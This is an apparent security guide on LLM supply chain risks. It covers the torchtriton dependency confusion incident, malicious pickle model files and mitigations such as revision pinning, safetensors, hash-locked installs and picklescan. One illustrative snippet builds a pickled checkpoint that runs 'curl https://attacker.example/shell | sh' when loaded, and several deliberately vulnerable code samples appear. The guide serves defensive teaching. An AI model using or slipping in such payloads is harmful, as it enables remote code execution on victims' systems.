LLM03: Supply Chain Vulnerabilities — Securing the LLM Software Supply Chain
In December 2022, PyTorch’s nightly build pipeline was compromised in a textbook dependency confusion attack. The package torchtriton — a legitimate PyTorch dependency — was shadowed by a malicious package of the same name on the public PyPI index. Anyone running pip install torchtriton fetched the attacker’s version, which exfiltrated /etc/passwd, SSH keys, and environment variables to a remote server. The malicious package was live for roughly 12 hours before PyTorch published a security advisory and pulled it. This wasn’t an attack on PyTorch’s model weights or training data — it was a supply chain attack on the Python packaging layer. In the LLM ecosystem, this attack surface is substantially wider: it includes model weights, fine-tuning datasets, embeddings, Hugging Face Hub repositories, quantized model files, and third-party agent plugins, each of which can be a vector for compromise.
What is LLM supply chain vulnerability?
Section titled “What is LLM supply chain vulnerability?”OWASP LLM03 describes the risk that attacker-controlled artifacts enter the LLM application stack through the supply chain rather than through runtime inputs. The threat model covers four distinct layers:
Dependency layer. Python packages, JavaScript libraries, Docker base images, and Rust crates that your LLM application depends on. Dependency confusion, typosquatting, and compromised maintainer accounts all apply here. This is the most mature attack surface — the PyTorch torchtriton incident, the ctx and discordpy-self PyPI compromises, and the event-stream npm incident all fall into this category.
Model artifact layer. Pretrained model weights downloaded from Hugging Face Hub, model registries, or direct URLs. A model file can contain pickled Python objects that execute arbitrary code on deserialization. Hugging Face researchers documented multiple malicious model uploads that used pickle serialization to embed os.system() calls inside .pt and .bin files. Downloading and loading such a file with torch.load() is equivalent to running an unsigned binary.
Dataset and fine-tuning layer. Training datasets hosted on Hugging Face Hub, S3 buckets, or third-party providers. A poisoned dataset can embed behavioral backdoors that activate on specific trigger phrases — see LLM04 for the model poisoning angle. From a supply chain perspective, the risk is provenance: if you cannot verify the integrity of the dataset you fine-tuned on, you cannot make behavioral guarantees about the resulting model.
Plugin and tool layer. Third-party LangChain tools, LlamaIndex integrations, AutoGPT plugins, and OpenAI Actions schema definitions. A plugin that your agent loads at runtime has the same privilege level as a Python import — if it is compromised or malicious, it can execute arbitrary code in your application’s process.
The exploit: malicious model artifact
Section titled “The exploit: malicious model artifact”Consider a data science team that pulls a popular quantized model from Hugging Face Hub without pinning a specific revision:
# VULNERABLE: unpinned model download, unsafe deserializationfrom transformers import AutoModelForCausalLM, AutoTokenizerimport torch
# VULNERABLE: no revision pin — latest commit could be compromisedmodel = AutoModelForCausalLM.from_pretrained("some-org/some-model")tokenizer = AutoTokenizer.from_pretrained("some-org/some-model")
# VULNERABLE: torch.load without weights_only=True — arbitrary code executioncheckpoint = torch.load("./checkpoints/finetuned.pt") # VULNERABLE: pickle RCEmodel.load_state_dict(checkpoint)An attacker who gains write access to some-org/some-model on Hugging Face Hub — through a compromised token, social engineering, or a malicious pull request — can push a new model revision. Because the code does not pin a revision, the next container build or from_pretrained() call fetches the attacker’s version.
The torch.load() on line 11 is independently dangerous: any .pt file that reached the filesystem through an untrusted channel can contain a __reduce__-based pickle payload:
# Attacker-crafted malicious checkpoint (illustrative — do not run)import pickle, os
class MaliciousPayload: def __reduce__(self): # This executes when unpickled by torch.load() return (os.system, ("curl https://attacker.example/shell | sh",))
import torchtorch.save(MaliciousPayload(), "malicious_checkpoint.pt")# torch.load("malicious_checkpoint.pt") → executes the shell commandThe exploit: dependency confusion
Section titled “The exploit: dependency confusion”# VULNERABLE: no hash pinning, no private index enforcement# torchvision==0.15.0 ← legitimate package# llm-utils==1.2.0 ← internal package name, also published to public PyPI by attacker
# pip install -r requirements.txt# If your private package "llm-utils" is also available on PyPI (higher version),# pip may resolve to the public (malicious) package depending on index priority.The dependency confusion attack works because pip resolves packages from the public index first when no explicit --index-url or --extra-index-url priority is configured. For internal packages that share names with packages the attacker has published to PyPI at a higher version number, pip silently installs the attacker’s version.
Mitigations
Section titled “Mitigations”M1: Pin model revisions and verify checksums
Section titled “M1: Pin model revisions and verify checksums”Always pin Hugging Face model downloads to a specific commit SHA, and verify the file hash of any downloaded artifact:
import hashlibfrom huggingface_hub import hf_hub_downloadfrom transformers import AutoModelForCausalLM, AutoTokenizer
# SAFE: pinned to a specific commit SHA — immune to repo overwritesPINNED_REVISION = "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2"EXPECTED_SHA256 = "deadbeef..." # compute from a known-good download
model = AutoModelForCausalLM.from_pretrained( "meta-llama/Llama-3.1-8B", revision=PINNED_REVISION, # SAFE: immutable git commit hash)tokenizer = AutoTokenizer.from_pretrained( "meta-llama/Llama-3.1-8B", revision=PINNED_REVISION,)
# SAFE: verify downloaded artifact hash before loadingdef verified_load(path: str, expected_sha256: str) -> bytes: data = open(path, "rb").read() actual = hashlib.sha256(data).hexdigest() if actual != expected_sha256: raise ValueError(f"Checksum mismatch: expected {expected_sha256}, got {actual}") return dataM2: Use safetensors instead of pickle-based formats
Section titled “M2: Use safetensors instead of pickle-based formats”The safetensors format stores tensor data only — it cannot embed executable Python code. Prefer it for any model weights you load at runtime:
from safetensors.torch import load_fileimport torch
# VULNERABLE: pickle-based loadingcheckpoint = torch.load("model.pt") # VULNERABLE: RCE risk
# SAFE: safetensors — no code execution possibletensors = load_file("model.safetensors") # SAFE: pure tensor data
# For transformers, prefer safetensors-backed modelsfrom transformers import AutoModelForCausalLMmodel = AutoModelForCausalLM.from_pretrained( "mistralai/Mistral-7B-v0.1", use_safetensors=True, # SAFE: loads .safetensors files only)M3: Audit Python dependencies with pip-audit and lock files
Section titled “M3: Audit Python dependencies with pip-audit and lock files”Maintain a locked requirements.txt with hash verification, and run pip-audit in CI to catch packages with known CVEs:
# Generate a locked requirements file with hashespip-compile requirements.in --generate-hashes -o requirements.txt
# Audit for known vulnerabilitiespip-audit -r requirements.txt
# Enforce hash checking at install time (CI/CD)pip install --require-hashes -r requirements.txt# pyproject.toml / pip.conf — enforce private index priority# SAFE: private index takes precedence; public PyPI only as fallback# pip.conf:# [global]# index-url = https://pypi.company.internal/simple/# extra-index-url = https://pypi.org/simple/# no-index = false # set true to block public PyPI entirely for production imagesM4: Scan model files before loading
Section titled “M4: Scan model files before loading”Use picklescan to detect malicious pickle payloads in model files before loading them:
# Install and run PickleScan on a directory of downloaded modelspip install picklescanpicklescan -p ./models/
# Output for a clean model:# No dangerous pickle imports found in 3 files# Output for a malicious model:# Malicious pickle imports found in models/finetuned.pt:# Global import: posix / systemimport subprocess, sys
def safe_load_checkpoint(path: str) -> dict: # SAFE: scan before loading result = subprocess.run( ["picklescan", "-p", path, "--exit-code"], capture_output=True, ) if result.returncode != 0: raise RuntimeError(f"PickleScan detected malicious content in {path}") import torch return torch.load(path, weights_only=True) # SAFE: scan + weights_onlyDetecting LLM03 with LLMArmor
Section titled “Detecting LLM03 with LLMArmor”LLM03 involves compromised artifacts in the supply chain — model files, Python packages, datasets. This requires provenance tracking and runtime scanning rather than static analysis of Python source code. LLMArmor’s AST-based scanner does not currently cover supply chain risks.
For comprehensive supply chain coverage, use complementary tools:
- pip-audit — scans installed packages against OSV and PyPI advisory databases
- safety — similar to pip-audit, with additional commercial feeds
- PickleScan — detects malicious pickle imports in model files
- Hugging Face model signing — Sigstore-based signatures for model artifacts
- Garak — runtime behavioral probing to detect backdoored models
pip install llmarmorllmarmor scan ./srcLLMArmor will still catch LLM01, LLM05, LLM06, LLM07, LLM08, and LLM10 patterns in your application code. For supply chain hygiene, combine it with the tools above.
Frequently asked questions
Section titled “Frequently asked questions”- How does the PyTorch torchtriton supply chain attack work?
- In December 2022, an attacker published a malicious package named
torchtritonto the public PyPI index. PyTorch usestorchtritonas an internal dependency name for its triton GPU kernels. Because pip resolves packages from the public index before a private one if not configured otherwise, any machine runningpip install torchtriton(or building a Docker image from PyTorch nightlies) fetched the attacker's version, which exfiltrated host information. The fix: pin dependencies to specific versions and hashes, and use--index-urlto prioritize private indexes. - Why is torch.load() a security risk?
- PyTorch's
torch.load()uses Python's pickle protocol by default. Pickle is fundamentally unsafe for untrusted input because the__reduce__method on any pickled class can specify an arbitrary Python callable to invoke during deserialization. An attacker who crafts a malicious.ptcheckpoint file can execute arbitrary shell commands simply by having their file loaded. Mitigation: usetorch.load(path, weights_only=True)or thesafetensorsformat, which stores only raw tensor data with no code execution path. - What is the safetensors format and why is it safer than .pt files?
- Safetensors is a model serialization format developed by Hugging Face that stores only tensor data in a simple binary layout. Unlike pickle-based formats (
.pt,.bin), safetensors has no mechanism to embed executable Python objects — loading a safetensors file cannot trigger arbitrary code execution. Most popular models on Hugging Face Hub now offer safetensors variants. Useuse_safetensors=TrueinAutoModel.from_pretrained()orfrom safetensors.torch import load_filedirectly. - How do I pin Hugging Face model versions in production?
- Pass
revision='<commit-sha>'tofrom_pretrained(). Every commit on Hugging Face Hub has an immutable SHA that cannot be overwritten, unlike branch names or tags. Find the commit SHA on the Hub's git history tab. For additional integrity, compute the SHA-256 hash of the downloaded model files and verify them on each deployment. Hugging Face also supports model signing with Sigstore for cryptographic provenance. - What is a dependency confusion attack and how does it affect LLM projects?
- Dependency confusion (also called namespace confusion) occurs when a package manager resolves a private internal package name by accidentally fetching a public package of the same name at a higher version number. For LLM projects that use internal Python packages (data processing utilities, custom tokenizers, internal API clients), if those package names are also registered on public PyPI by an attacker at a higher version,
pip installmay silently install the attacker's version. Mitigation: use hash-locked requirement files (pip-compile --generate-hashes), configure--index-urlto prioritize private indexes, or use--no-indexfor air-gapped production builds. - Should I audit Hugging Face Hub models before using them in production?
- Yes. Run
picklescanagainst any downloaded model files before loading them. Prefer safetensors-format models. Check the model card and repository provenance: is the organization verified? Does the model card explain the training data and methodology? For fine-tuned or community-uploaded models, the bar should be higher — treat them the same as a third-party Python package: review before use, pin the revision, and monitor for updates. - Is LLM03 covered by LLMArmor?
- No. LLM03 supply chain risks involve artifact provenance, package integrity, and runtime behavioral analysis — none of which are detectable by inspecting Python source code. LLMArmor focuses on structural code patterns (LLM01, LLM05, LLM06, LLM07, LLM08, LLM10). For supply chain coverage, use
pip-auditfor dependency vulnerability scanning,picklescanfor model file integrity, and Garak for behavioral backdoor probing.